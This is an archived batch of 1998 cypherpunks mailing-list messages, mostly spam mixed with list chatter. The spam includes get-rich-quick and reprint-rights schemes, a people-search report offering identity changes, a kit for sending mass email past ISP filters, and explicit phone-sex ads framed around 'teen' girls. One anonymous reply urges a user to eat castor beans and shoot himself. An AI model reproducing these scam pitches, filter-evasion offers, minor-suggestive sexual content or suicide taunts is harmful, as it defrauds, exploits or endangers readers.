   If you are not completely satisfied after reading Report #5599 and its Support Package simply return them both within 120 Days for a full refund. No questions asked. You keep the floppy disks, Business Journal and Dream Package. You have NOTHING to risk and a FORTUNE to make. Here's your RISK FREE opportunity to change your financial situation forever!!

{cut}==========================================================

                                     Special Report #5599 Order Form

___ Please rush me a copy of OFS's Offshore Special Report# 5599 and all Bonuses. I understand I have Full Reprint Rights and can sell Report# 5599 for $50.00 (U.S.) Keeping ALL THE MONEY!

___ I have enclosed a CHECK /MONEY ORDER for $50.00

Please mail the report to (PLEASE PRINT CLEARLY)

Your Name: _______________________________________________________________

Address: __________________________________________________________________

City: ______________________________________________________________________

State: ______ Zip: ________________

Phone: (___) ______-___________ Fax: (___) ______-___________

Email Address ___________________________

Mail This form & The check or money order for US$50.00 to the Address below:

Dynamic Communications
P.O. Box 373-356
Decatur, GA 30037-3356
Fax: (770) 234-4241
Phone: (404) 274-8669

Or, if you prefer, you may also pay by faxing your credit card information or copy of your check to the number above along with the information requested on the order form. 

Please Note: If ordering by credit card be sure to include card type, number and expiration date.  After dialing you will be prompted to press 2 for fax.

Sorry, Report #5599 is too big for us to email it to you, we will send it Priority Mail within 24 hrs of receipt of your order.     







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 7 Aug 1998 16:11:59 -0700 (PDT)
To: silveri@mgmtscience.com>
Subject: Re: SecDrv and Win95
Message-ID: <199808072311.BAA15324@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian F. Silver wrote:
> I use Blowfish and GOST (depending on the size of the container I'm
> working with), and avoided DES, even before Deep Crack was invented.
> :-)
> 

"Deep Crack" was invented in 1993 by John Gilmore. (based on a paper at Eurocrypt '93).
It was implemented more recently.

BTW this is all in the archives in 1993. Everything was discussed in the first
12 months of cypherpunks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: announce@inbox.nytimes.com (New York Times subscription robot)
Date: Sat, 8 Aug 1998 00:59:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199808080848.DAA37890@inbox.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for registering for The New York Times on the Web!

The Times on the Web brings you the authority and integrity of The
New York Times, with the immediacy, utility and depth of the Internet.
You'll find the daily contents of The Times, along with news updates every
10 minutes from the Associated Press and throughout the day from New York
Times editors.

You'll also find reports and features exclusive to the Web in our
Technology and Books areas. You can explore a 365-day archive of The New
York Times for free, and download articles at a small charge.

The site also features:

== Up-to-the-minute sports scores and statistics
== Breaking stock market news and custom stock portfolios
== Current weather conditions and five-day forecasts for more than 1,500
cities
worldwide
== A free, searchable library of more than 50,000 New York Times book reviews
== A searchable database of real estate and help wanted listings
== The crossword puzzle, bridge and chess columns, available by subscription

To familiarize yourself with the site, you might want to take our guided
tour, available at http://www.nytimes.com/subscribe/help/quicktour/

Thanks again for registering. Please visit us again soon at

http://www.nytimes.com

Sincerely,
Rich Meislin
Editor in Chief


*****************************************


Please do not reply to this message.  If you did not authorize   
this registration, someone has mistakenly registered using your
e-mail address.  We regret the inconvenience; please see

http://www.nytimes.com/subscribe/help/cancel.html for instructions.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 7 Aug 1998 21:41:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: FUCKIN MONKEY BUMKIN FRICASEE
Message-ID: <d49230aacad2bfe0ff75d91797a1a967@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Aug 1998, Meredith Balcom wrote:

> 
> 
> 

Empty space big maybe your cranium represent. Yoda I am. Forward you go.
Jedi you are not. Cypherpunk you are not. Government employee you
qualified to be.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 7 Aug 1998 21:01:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Tim caught rehashing from Archives
Message-ID: <199808080401.GAA08821@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim's thoughts on the archives are all the more ironic for being rehashed
from "the good old days (TM)".

--- forwarded article -------------------------------------------------------

>From owner-cypherpunks  Thu Jan  6 16:04:33 1994
Received: by toad.com id AA03391; Thu, 6 Jan 94 16:00:13 PST
Received: by toad.com id AA03329; Thu, 6 Jan 94 15:55:35 PST
Return-Path: <arthurc@crl.com>
Received: from crl.crl.com ([165.113.1.12]) by toad.com id AA03317; Thu, 6 Jan 94 15:55:27 PST
Received: by crl.crl.com id AA29063
  (5.65c/IDA-1.5 for cypherpunks@toad.com); Thu, 6 Jan 1994 15:54:06 -0800
Date: Thu, 6 Jan 1994 15:44:00 -0800 (PST)
From: Arthur Chandler <arthurc@crl.com>
Subject: Re: cypherpolitics
To: "Perry E. Metzger" <pmetzger@lehman.com>
Cc: cypherpunks@toad.com
In-Reply-To: <199401062001.PAA20538@snark>
Message-Id: <Pine.3.87.9401061500.A28066-0100000@crl.crl.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

On Thu, 6 Jan 1994, Perry E. Metzger wrote:

> 
> Any sufficiently advanced mailing list is indistinguishable from
> noise.
> 
> Perry
> 
     I realize we're all supposed to smile knowingly at this cynical remark;
but I can't let the cynicism pass without a commentary. If the list is 
advanced, then the issues being discussed may strike newbies as arcane -- 
this is noise only to the uninitiated. And repeated threads may strike 
old-timers as rehash -- and therefore a kind of noise.  But -- at least 
as far as Cypherpunks goes -- even apparently repetitive threads have 
new slants, unforeseen shadings of personal meaning, and new contexts to 
save them from being considered as just noise.
  "The main cause of failure in education," said A.N. Whitehead, "is 
staleness." And a stale reader will hear only noise if the attention 
isn't focussed enough to see the actually new within the apparently old.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: seeall49@hotmail.com
Date: Sat, 8 Aug 1998 04:52:22 -0700 (PDT)
Subject: Are They Investigating You?
Message-ID: <QQfbnr07754.199808081152@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


ARE YOU BEING INVESTIGATED?

Has your personal and credit information been stolen?  Has someone
assumed your identity?

Would you like to locate an old friend, relative, military buddy or sweetheart?

Do you want to find a person's assets to collect a debt or judgement?

Would you like to check a person's criminal record before renting
them space or giving them employment?

Would you like to fix up your credit bureau report, create a new
identity or even disappear?

Are you going to have surgery?  Would you like to know how many malpractice 
suits have been filed against your doctor?

Now you can learn all this plus much, much more with our 
brand new 45  page report 

"INTERNET SLEUTH"!

Learn the Internet tools and resources that are used to investigate you,
your relatives, friends, neighbors, enemies, employees or anyone else!  

We will give you thousands of Internet locations to look up people,
credit, social security, current or past employment, driving records, 
criminal records, medical information, military records, addresses,
phone numbers, immigration, divorce, labor and criminal laws!

We will also give you sources to find missing children and parents,
hazardous waste sites, how to do Freedom of Information Act information
searches, how to do skip tracing and backround checks on prospective dates, 
brides or grooms, employees, renters, vendors, new clients and competitors!

You will also learn about and where to get surveillance and spy devices,
private mail forwarding and annonymous email forwarding sites, search 
for copyrights, patents and court cases and how to make your
assets untraceable!  We will show you how to get copies of 
credit reports, adoption databases, information on drugs, 
poisons and how to get your share of government programs and benefits!

Can you find this information by using the Internet Search Engines?
The answer is MAYBE if you get lucky and if you want to spend many
hours going through 25,000 plus hits per subject!  We and our staff
have spent hundreds of hours and many thousands of dollars compiling 
this information for you!  Now you can have it on a silver platter
for LESS THAN TWENTY BUCKS during this special email promotion!

You frequently hear over the media, television, radio, the newspapers, 
how personal information is being used, traded and 
sold over the Internet...usually without your permission or knowledge. 
Our report will show you HOW IT IS DONE!!!

Would you like to find that old romantic flame...find telephone, 
address or email information on almost anyone...even unlisted
phone numbers?  How about your family "tree"?  We will teach
you how to turn years of work into hours of fun!

Military?  Check Army, Navy, Air Force and Marine records. 
extensive Vietnamese war records, MIA info, much more!

Looking for a job?  Find the job you are seeking...even in another state
or another country!  We will teach you how!

Looking for a new love interest or spouse or even sex partner? 
We will show you where to look for fast results!

Want up-to-the-minute health and medical information?  Learn how to 
cure fears and phoebias, the latest drugs and treatments for almost
any ailment or desease from the drug companies themselves as well as
from universities and the Center for Desease Control.  Want to learn
the most effective way to loose weight?  It's all here in our report!

If you believe that the information compiled  about you should be as
available to you as to the people that compile it about you without
your knowledge or permission than you must order "THE INTERNET
SLEUTH REPORT" immediately!

Our "INTERNET SLEUTH REPORT" is normally sold by direct mail for
$39.95 and will soon be in book stores for $29.95.  However, to
generate publicity and "get the word out" we are making this 
10 day Email Special Offer of our Complete 45 Page Report for
only  $19.95 plus $3 for shipping and handling [total $22.95].
Sold with our 10 Day Money Back Guarantee!

This is the biggest bargain on the Internet and the information it
will give to you will give you great power!  It can really change your
life in a positive way.  Order Now!

The Complete 45 page "INTERNET SLEUTH REPORT" only $19.95 plus
$3 shipping and handling - total $22.95.  Shipped in plain wrapper
by First Class Mail.

Add $5 for priority mail delivery.  Add $20 for overnight Express!

We accept Visa, MasterCard, American Express or Discover.
We can also accept your check by phone or Fax.

You may order by phone 9 am to 10 pm [NY Time] by phoning
[718] 287-3800

You may order by fax 24 hours per day by phoning our fax line at
[718] 462-5920.
You can fax your credit card information or your check

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

explosive99@juno.com

[Note: If you order by email and do not receive an email confirmation within
24 hours, please phone our office at 718-287-3800]


You can also order by mail by sending $22.95 cash, check, money order
or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add $1.70 for Sales Tax

The Following Order Form is for Your Convenience!
Use it by Mail, Fax or Email!
.............................................................................................................

Please ship me ________copies of the INTERNET SLEUTH Report

at $19.95 each plus $3.00 for shipping and handling [$22.95]

Credit Card #_______________________________Exp Date________

Signature______________________________________________

Ship to:  Name_________________________________________

Address________________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
remove in the subject line.  This is a one time offer and you 
should not hear from us again!

TCPS,Inc., 4718 18th Ave., Suite 135, Brooklyn, NY 11204

Office [718] 287-3800  Fax [718] 462-5920 24 hours
[9am to 10pm NY Time]

[c] Copyright 1998 TCPS, Inc. All Rights Reserved.






















































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 8 Aug 1998 02:49:58 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Monica Doughwinsky: An American cream come true/Woman marries herself
Message-ID: <19980808080000.24309.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/8/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 7 Aug 1998 17:46:19 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Pauline Hanson's One Nation - August update
Message-ID: <1.5.4.32.19980807235951.00748d80@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Issue 2.1a, August 1998

----------------------------------------------------------------------------
PLEASE NOTE: No unsolicited email is sent. If you do not want to be on the
mailing list please say "REMOVE" in the subject line and return this message
in the body.
----------------------------------------------------------------------------

Dear One Nation supporter in NSW,

--------------

One Nation and media reporting:

There appears to be a discernable move by certain journalists in Australia
to look back upon the professionalism (or lack of it) of their own
profession in their reporting on Pauline Hanson and One Nation over the last
few years.

The reflective mood appears to have stemmed from the eviction of a
Queensland Times journalist and photographer from a press conference a few
weeks back for what Mrs Hanson saw as 'unbalanced' reporting by the paper in
the lead up to the Queensland State Election.

On Monday night (10th August) the ABC's Four Corners programme will be
looking at One Nation and the media. 

A book is currently being written by a well-know political commentator,
author and publisher who will be looking at the same theme. 

In relation to this subject - you might find a One Nation's members
firsthand viewpoint on the recent 60 Minutes debate between established
mainstream party representatives and One Nation members of interest:
http://www.gwb.com.au/gwb/news/onenation/60
The agreed format of the debate is clearly in dispute.

---------------

The recent Nicholas street rally in Ipswich:

The Ipswich City Council took the extreme, undemocratic step of locking Mrs
Hanson out of the Ipswich Civic Centre last week. Undaunted Mrs Hanson went
ahead with the rally to address her constituents in the seat of Oxley in the
open street.

She faced about 500 supporters and about 100 protesters in an explosive
environment which was handled, as always, with great professionalism by the
Queensland police.
Full report with pictures here:
http://www.gwb.com.au/gwb/news/onenation/nicholas

Your rights if confronted by protesters (1914 Crimes Act) are also outlined
at this link.

---------------

The One Nation Website:

This has been upgraded and is now fully searchable. There is also a new
"theme" based page to give you clues to accessing specific areas within what
has become a massive historical archive on One Nation.

See: http://www.onenation.com.au

---------------

The One Nation on-line discussion forum:

In another first One Nation MPs are now interacting directly with and taking
notes from the One Nation discussion board. Another Australian first by One
nation. You may join the participants on this moderated discussion board by
sending an email to the writer.
The discussion board can be seen at:

http://plato.itsc.adfa.edu.au/politics/

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "3syute65259@sjoki.uta.fi" <3syute65259@sjoki.uta.fi>
Date: Sat, 15 Aug 1998 11:13:04 -0700 (PDT)
Subject: Creating Wealth in America (36370)
Message-ID: <34542.78379@mail.badchair.com>
MIME-Version: 1.0
Content-Type: text/plain


Creating Wealth In America

>From the desk of Robert Allen, The Author of 2 Mega Best-Sellers,
Nothing Down and Creating Wealth in America.

San Diego, California
11:29 P.M.

"I can't sleep until I get this off my chest."
"I'm extremely frustrated."

Odds are that nine out of ten people who receive this letter will discard it
without 
a second thought.  Yet, I know that I have discovered a secret that could
change 
your financial life forever!  And I'm willing to share it with you for FREE.

     Do you want to end your money pressures forever?
     Do you want to double your income?
     Do you want to build an extra stream of income quickly?

If you answered yes, then let me show you how you can begin living your
dreams, 
this year before it's too late.  I'll get right to the point.

As it says on the letterhead, my name is Robert Allen.  I'm famous for my two
#1 New 
York Times best-selling books.  Nothing Down and Creating Wealth in America.
There 
are lots of millionaires who credit their success to one of  my books or
seminars.  So 
when I share this secret with you, I want you to know that I've done my
homework.  
Here it comes.

I have discovered what I believe is the perfect home-based business.

Although I'm well known for real-estate investment books and seminars, this
new business has absolutely nothing to do with real-estate.  In fact, it's
much easier 
and far less risky.
 
It involves:

-No employees
-Little risk
-Little start up cash
-It's so simple, anyone can do it

You could be earning $1,000 a week in as little as 90 days.  One person I know
went  from zero to $3,000 a week in 60 days.  That's $150,000 a year extra, 
hassle-free income!

In my 20 years of research, I can honestly say, "I've never seen a faster,
easier way to 
create a stream of income".

I know this sounds too good to be true.  Frankly, I didn't believe it myself
at first.  Finally, I agreed to check it out.  As a test, I selected a small
group of people and introduced them 
to this incredible opportunity.   Almost immediately, many of them started
earning profits.  Within a week, many were earning incomes of $4,000 per month
in net cash flow.  Now, some of them are cashing checks for $3,000 a week.
And this is just the beginning!  Their earning potential could be unlimited!

Would you like to learn how to do that?  I'd love to show you how.  
But only if you're interested enough to make one telephone call.  
The number to call immediately is 1-888-572-3714.  
It's a 3-minute, 24-hour recorded message.  
This may be the answer you have been seeking.

Warmly,

Robert G. Allen


P.S.  I want to show you how to create extra streams of income quickly.
         Go to the phone and call now 1-888-572-3714.
******************************
53634




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sea-Ex" <seaex@big.net.au>
Date: Fri, 7 Aug 1998 19:35:57 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: An apology
Message-ID: <01bdc273$c6f34060$853a08d2@vognuefu>
MIME-Version: 1.0
Content-Type: text/plain




Dear Kryz
 

Thank you for your response.
 
We apologise profusely for any inconvenience 
caused by our Newsletter.  Due to a computer malfunction, a data-base was 
transferred and sent that was not intended.  We have  rectified this 
fault, and no  transmissions apart from the original ONE (1)  have 
been sent,although some servers may relay messages - again we apologise, but it 
is now out of our control. 
 
We have removed your name from ALL files, as you 
requested.
 
Regards
SEA-EX  AUSTRALIAN SEAFOOD 
EXPORTS


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <dformosa@cit.nepean.uws.edu.au>
Date: Sat, 8 Aug 1998 03:12:13 -0700 (PDT)
To: JBrown4330@aol.com
Subject: Re: Republicans
In-Reply-To: <ca7606ae.35bd2469@aol.com>
Message-ID: <Pine.LNX.3.93.980808185735.161D-100000@shirley>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 27 Jul 1998 JBrown4330@aol.com wrote:

> Hey:  Who made up the term "Politically Correct"?  Not Christians and not
> Republicans.

In fact it was a group of British politishions who where on the
same idiological side as the Christians and the Republicans who created
the term.

[...]

> the freedom to CHOOSE to pray in schools,

Come off it, you can still pray in school.  There is nothing to stop you.
You just can't have the goverment in the form of the school encouraging
it.  I would not like my childeren being told what to think by the
goverment on an issue as senertive as religion, whould you?

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNcwT9KQK0ynCmdStAQEL7gP5AU2vDytNh0XQbhHgWtwMkeNuO5kYdqCz
x/rcJpLnwNobAW5T5MAAlbGst2fAD4xamt4OspOXaRLi5ozCC0p6EhoBKarpSbOx
vxCYgSPUUse459uzF+Fp3V9KCEhOrxYcIxkjylO1PsOny40zqhs20jgaMd3tGm0i
0OMh7rkYL+c=
=4D4G
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sat, 8 Aug 1998 21:11:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mysterious taglines
Message-ID: <d66dc6966d2fdcad0f4904aade6fa1ed@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Aug 1998, Rabid Wombat wrote:

> I cannot discuss that here, as Tim May will likely enter the discussion 
> to enforce his intellectual property rights and remind us that he 
> discussed this before the rest of us were born. All worthwhile 
> discussions of cryptography were held prior to 1994. This list is to be 
> henceforth used for the posting of long rambling prose induced by the 
> inhaling of household chemicals. Contact sniffmonger toto, check the 
> archives, and bring me another scotch.

Or if trolls are more your style, contact trollmonger bill(sic) payne(sic)
and carbon copy half of Congress.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 9 Aug 1998 02:48:11 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: What if men menstruated?/Viagra - the facts
Message-ID: <19980809080000.26159.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/9/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 11 Aug 1998 07:44:14 -0700 (PDT)
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <3.0.5.32.19980810230615.00924100@205.83.192.13>
Message-ID: <Pine.BSF.3.91.980809132342.5048B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 10 Aug 1998, Reeza! wrote:

> At 02:24 PM 8/10/98 -0500, William H. Geiger III wrote:
> >
> >Many of the unusual suspects that will go along with this plan will be
> >from the states like Alaska, Idaho, North Dakota, ...ect who are fearful
> >that their constituents will actually have to pay a fair price to have
> >mail and packages delivered to bum-fuck nowhere. I don't recall the name
> >but one of the critter from Alaska was very upset that if USPS looses it's
> >monopoly delivery in Alaska would no longer be subsidized and that they
> >might have to pay market value to have packages delivered by plane to the
> >far reaches of the wilderness (god forbid!!).
> >
> 
> Where are you from?
> Bum-fuck nowhere to you and bum-fuck nowhere to me are two different places.
> 
> A letter costs 32 cents (presently) whether you send it across town, or
> across the country.
> This knife cuts both ways. Once the precedent is set, other industries
> would quickly join in.
> How long would it take, do you think, until some whizbang at the electric
> company decides 'lectric usage rates should be determined on distance from
> the 'lectric generating plant?
> 
> Reeza!

This is how it works in a free-market economy (doh!).

One of the self-appointed/assumed functions of gubbmint is to "fix" this, 
by granting some organization a monopoly in return for bearing the costs 
of creating infrastructure, as well as spreading the cost of servicing a 
(smaller) number of remote customers across a (larger) number of 
non-remote customers.

Whether this is a good thing(tm) or a bad thing(tm) depends, as usual, on 
which side of the subsidy you are on.

I would argue that such monopolies are desirable, and that their creation 
is a proper function of a responsible government. When the monopoly is no 
longer necessary (sufficient economy of scale has been reached to permit 
a competitive market to adequately service the customer base), then 
deregulation can occur.

I'm sure some on this list will argue this with me from their mountain 
cabins in bf-nowhere, but without such monopolies, they'd be sending 
smoke signals rather than paying $10,000 to get a phone line installed to 
their home. If you doubt this, look at the heavy reliance on wireless 
communications in third-world countries, and take a moment to consider 
how recently the consumer-wireless market arrived on the scene. 

Before you argue "the best government is no government", visit a few 
third-world capitols, and note how you move from a modern capitol city to 
flintstones-like living in about 50km.

A $.32 price on first-class mail to anywhere in the country is a good 
deal for all. OTOH, package delivery has become sufficiently competitive, 
and probably needs to be revamped.

Just my $.02.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phusnikn <phusnikn@simlab.net>
Date: Sun, 9 Aug 1998 07:39:21 -0700 (PDT)
To: clerke@emirates.net.ae
Subject: Re: Is there a freeware knockoff of SSH for win95
In-Reply-To: <002901bdc236$1c6956d0$86a9aac2@strange>
Message-ID: <35CDB52E.C81B5637@simlab.net>
MIME-Version: 1.0
Content-Type: text/plain


How do i get off this mailing list? cybertoads/cyberpunks of what ever it
is.??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EpicTeU@aol.com
Date: Sun, 9 Aug 1998 11:49:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: .
Message-ID: <64d5a71.35cdef20@aol.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberPsychotic <fygrave@freenet.bishkek.su>
Date: Sun, 9 Aug 1998 03:29:30 -0700 (PDT)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: text analysis
In-Reply-To: <3.0.5.32.19980806202007.0090e140@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.96.980809162831.25332x-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


yeah. So far I played with it, I found out that allocating arrays in
memory as N-dimentional matrix seem to be the best solution. The rest of
things seem to be pathetically slow. I generally do all my coding under
Linux so there's no problem with memory limits. Thanks again for all help.

F.
---
Fyodor Yarochkin	tel:[996-3312] 474465		email:fygrave@usa.net
http://www.kalug.lug.net/		    X-Noizz http://infernus.online.kg
echo 'subscribe kalug' | mail majordomo@krsu.edu.kg  :  join Kyrgyztani L.U.G.
- "Only Schizophrenia beats being alone." -  http://www.kalug.lug.net/fygrave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: XoVoX123@aol.com
Date: Sun, 9 Aug 1998 15:03:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Please help
Message-ID: <5257d040.35ce1c8e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Could you please send me the Anarchy Cookbook.....
I really want it and I cant find it anywhere!
Thanx for your help.. Mike Jonhson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@yahoo.com
Date: Sun, 9 Aug 1998 18:33:41 -0700 (PDT)
Subject: Send Your Own Mass E-Mail..Learn How
Message-ID: <199808100129.SAA21378@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You can profit from junk e-mail. If your computer is sitting idle while you're at work or play...you're crazy! 
You could be earning money while you're asleep, at work or out having fun. You can make incredible 
money sending your own mass e-mails. If you own your own business or have a product or idea to sell , 
then you probably know that all advertising works..it's just a question of whether it's cost effective or not. 
What could be more cost effective than a ZERO cost of adverising? If you sent out 500,000 e-mails which 
would take you only a few minutes to set your computer up to do and you only recieved one half of one 
percent response..that would be 2500 people responding to your ad. And the cost to do it was NOTHING. 
Junk e-mail is here to stay, so wouldn't it be nice to laugh every time you receive a piece of junk e-mail from 
someone because you know for every one you receive, you're sending out hundreds of  thousands. If 
your computer is sitting idle while you're at work or play...you're crazy! You could be earning money while 
you're asleep, at work or out having fun. It's not like you have to sit there and watch it run!
     So why isn't every one doing it? Well your local internet service provider spent lots of money installing 
filtering equipment to keep out this so-called junk e-mail and, in fact, for years there's been sort of a fun 
little war going on between the junk e-mail software writers and the internet serrvice provider filter 
software writers to see who could out-smart who.The end result is that sending mass e-mails legally has 
become an art . But it's really all about knowing the secrets and having the right software.
      AVATAR Publishing is offering you the type of expertise and support that would take you years to 
learn. We know all the secrets (obviously or you wouldn't be reading this would you?) and we have the 
software to deliver to most of the internet service providers. So here's the offer... AVATAR is offering you 
a mass e-mail starter kit comlete with step by step instructions on how to get started sending out mass e-
mails...a current explanation of what's legal and not legal...how to extract e-mail addresses from the 
internet ...how to get targeted e-mail addresses...a FREE trial version of the most effective mass e-mail 
software program ever developed...a list of bulk e-mail friendly internet service providers....a complete 
explanation of the secrets of how to legally get your mail through the filtering and why it works....and 
finally a real telephone number so you can have technical support and keep updated on new developments 
in the mass e-mail community. The total cost of this kit is only  $29. 
    If you would like to stop having your computer sit idle while you're at work or asleep and start having it 
make money for you  .....  

			 Send $29  to:	AVATAR Publishing
                                                                               	1000 E.Walnut St.
                                                                                Suite 213
					Pasadena,Ca.91106
                                                                          
					- OR -

			Order by Phone:	(626) 792-1764

To be removed from our e-mail list, submit your e-mail address to avatar502@yahoo.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jane@hotmail.com
Date: Sun, 9 Aug 1998 16:54:25 -0700 (PDT)
Subject: Re: TIME FOR A FUCK
Message-ID: <199808092354.TAA03272@alpha.cyberplex.com>
MIME-Version: 1.0
Content-Type: text/plain


Dildo in her pussy, finger in her ass!

Can you smell her wet teen pussy?

She's sooo tight, so young, so clean, so innocent! Can you smell her wet
teen pussy?!

CALL +1-(664)410-3290 TO LICK HER PUSSY NOW!

Her pussy is dripping wet! she's eager to fuck you live!

CALL +1-(664)410-3290 NOW!

Too shy to talk? not a problem, why dont you just listen to her playing
with herself!

100% FREE SERVICE! ALL YOU PAY IS LONG DISTANCE, NO MORE TO PAY!

What are you waiting for?  Pick up the phone, and fuck her now! she'll
satisfy all your sexual fantasies guaranteed!

CALL +1-(664)410-3290






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 9 Aug 1998 11:46:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is there a freeware knockoff
Message-ID: <199808091846.UAA22055@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday, 09 Aug 1998 at 14:41:50 +0000, phusnikn <phusnikn@simlab.net> revealed the depths of his ignorance by writing:

> To:            clerke@emirates.net.ae
> Copies to:     cypherpunks@toad.com
> Subject:       Re: Is there a freeware knockoff of SSH for win95
> 
> How do i get off this mailing list? cybertoads/cyberpunks 
> of what ever it is.??

Oh, man! That's what I want to know! How do _you_ get off
this mailing list? The question of the day, isn't it? Anyone
who uses "cyber" in near proximity to "punks" is automatically
disqualified from being on this list. So how did you slip in
here? You're here, but unfortunately getting off/out is not
so easy. I could suggest that you withdraw all your savings
and buy a clue, but that would obviously be futile in your
case.

You should probably contemplate your navel and how you got 
_onto_ the list, for oh, say, three hours. If enlightenment 
doesn't come, you might try eating a handful of castor beans. 
I've heard that aids digestion. Not yours, of course, but it
will no doubt ease the pains of the rest of the list
members.

If you're still troubled by list membership after that, you
might try the old tried and true solution for undesired list
problems: shoot yourself in the head.

If that doesn't work, try a larger caliber.

If that doesn't work, try loading the gun first.

HelpfulListInfoMonger II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: refinow@mail.wxs.nl
Date: Sun, 9 Aug 1998 22:04:23 -0700 (PDT)
To: sbraum@mail.cs.net
Subject: $$Homeowners$$
Message-ID: <287821953782.PDR72593@mail.wxs.nl>
MIME-Version: 1.0
Content-Type: text/plain


*********************************
This message complies with the proposed United States Federal
requirements for commercial email as well as the Washington State
Commercial Email Bill. For additional information see:
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html
Washington State Commercial Email Bill:
http://www.wa.gov/wwweb/AGO/junkemail/
Required Sender Information:
American Capital
Ft. Thomas, KY 41075
drichards73@hotmail.com
1-212-796-6549

Further mailings to you may be stopped at no cost to you by sending a
reply to: remove@remove-list.com
********************************



 GET THE MONEY YOU NEED RIGHT NOW!

